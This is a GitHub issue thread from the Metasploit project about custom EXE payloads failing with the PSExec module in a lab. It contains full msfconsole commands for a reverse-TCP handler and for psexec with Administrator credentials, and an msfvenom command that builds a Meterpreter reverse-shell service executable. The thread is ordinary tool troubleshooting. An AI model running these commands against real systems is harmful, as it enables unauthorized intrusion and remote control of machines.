### ISSUE TITLE
Custom EXE fails on PSExec module

### ISSUE THREAD

**Issue by wizard32** [rapid7/metasploit-framework#10236]
## Intro
EXE::CUSTOM options fails on PSExec module _(and not only)_.

## Lab Configuration
- [ ] Windows 7 IP: **172.0.0.12**
- [ ] Kali Linux IP: **172.16.0.14**
- [ ] **Custom EXE:** Meterpreter Reverse TCP connection at Port 4444

### Kali Linux
![image](https://user-images.githubusercontent.com/5232577/42155165-57bc3b58-7df0-11e8-9a65-59fdde486078.png)

#### Multi Handler
```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > set LHOST 172.16.0.14
msf exploit(multi/handler) > set ExitonSession false
msf exploit(multi/handler) > exploit -j
```

#### PSExec Module
```
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set RHOST 172.16.0.12
msf exploit(windows/smb/psexec) > set SMBUSER Administrator
msf exploit(windows/smb/psexec) > set SMBPASS admin_pass
msf exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set TARGET 2
msf exploit(windows/smb/psexec) > set LPORT 4444
msf exploit(windows/smb/psexec) > set LHOST 172.16.0.14
msf exploit(windows/smb/psexec) > set DisablePayloadHandler true
```

Connection establishing successfully but after a couple of seconds connection closes without removing the service, deleting the .exe file and creating a rundll32.exe process.

![custom_exe_1](https://user-images.githubusercontent.com/5232577/42157346-1c2364a8-7df6-11e8-987e-c4aec120dcf3.png)
![custom_exe_2](https://user-images.githubusercontent.com/5232577/42157369-2edce952-7df6-11e8-934e-98fa575d7936.png)
![custom_exe_3](https://user-images.githubusercontent.com/5232577/42157372-30c01870-7df6-11e8-8762-38a1f3f546a9.png)

**Comment by kaospunk** [comment]
Did you just try to use a normal executable or was it a service executable? Since psexec works by creating a service you can't just use the default exe format generated by msfvenom, for example, as it will not work properly.

**Comment by wizard32** [comment]
I'm using a normal EXE file as I was using the last 2 years and it was working without any problem. If you try to use also the exe as custom exe on bypass uac modules you got the same results. In the past there wasn't that kind of reactions when i was using that.

**Comment by kaospunk** [comment]
For the sake of troubleshooting, could you generate an exe-service artifact and try that with EXE::Custom?

Also, I didn't see you set a target in your psexec options so it's odd that it used the native upload vs powershell target. I know you wanted native upload in this case since you're using an exe, but it seems like it should have autoselected the powershell target by default on Win7.

**Comment by wizard32** [comment]
I tried creating a exe-service using msfvenom and seem to work fine.

`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.0.14 LPORT=4444 -f exe-service -o shell-service.exe`

![screenshot from 2018-07-13 11-06-17](https://user-images.githubusercontent.com/5232577/42680175-e38c5272-868c-11e8-9ec1-10ab08f1be93.png)

![image](https://user-images.githubusercontent.com/5232577/42680303-4fca2946-868d-11e8-9446-0ef5972fdb36.png)

It's not very clear to me why a normal EXE is not suitable for the psexec method.

**Comment by fsacer** [comment]
This could be added to module info, otherwise this can be closed

**Comment by sempervictus** [comment]
Psexec in binary mode uploads a file, registers it as a service, and starts the service in system context to execute the payload. Portable Executables (PEs) need to be compiled specifically with service start/stop hooks (preferably returning the proper structs to their callers) in order to accept the sc start/stop calls. Im not sure if its upstream, but there's Util::Exe code which permits the injection of these stubs into normal PEs as well IIRC.
